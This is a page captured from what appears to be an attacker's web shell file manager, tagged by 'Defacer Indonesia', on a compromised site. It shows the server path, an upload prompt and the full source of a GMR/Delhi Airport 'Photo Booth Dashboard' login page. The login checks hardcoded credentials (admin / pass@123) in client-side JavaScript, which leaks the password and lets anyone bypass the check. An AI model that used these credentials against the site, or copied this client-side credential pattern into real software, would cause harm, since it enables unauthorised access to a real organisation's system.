whoami7 - Manager
:
/
home
/
analuakl
/
ankurmedia.com
/
GMR
/
Upload File:
files >> /home/analuakl/ankurmedia.com/GMR/index.php
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Photo Booth Dashboard Login</title> <link rel="stylesheet" href="css/styles.css"> <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css" rel="stylesheet"> <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/js/bootstrap.bundle.min.js" integrity="sha384-YvpcrYf0tY3lHB60NNkmXc5s9fDVZLESaAA55NDzOxhy9GkcIdslK1eN7N6jIeHz" crossorigin="anonymous"></script> <script> function validateLogin(event) { event.preventDefault(); // Prevent form submission // Get user input var username = document.getElementById("username").value; var password = document.getElementById("password").value; // Check credentials (You can replace this with database validation) if (username === "admin" && password === "pass@123") { window.location.href = "dashboard.php"; // Redirect to dashboard } else { alert("Invalid Username or Password!"); // Show error } } </script> </head> <body> <div class="container"> <div class="sidebar"></div> <div class="login-container"> <div class="logo"> <img src="image/gmr-and-igi-logo.png" alt="Delhi Airport and GMR Logo"> </div> <h2 class="photo-booth-dashboad">PHOTO BOOTH DASHBOARD</h2> <form class="mt-4" onsubmit="validateLogin(event)"> <label for="username" class="form-label">USER NAME</label> <input type="text" id="username" class="form-control" placeholder="User Name" required> <label for="password" class="form-label">PASSWORD</label> <input type="password" id="password" class="form-control" placeholder="Password" required> <button type="submit" class="btn btn-warning w-100 fw-bold">LOGIN</button> </form> </div> </div> </body> </html>
Copyright ©2021 || Defacer Indonesia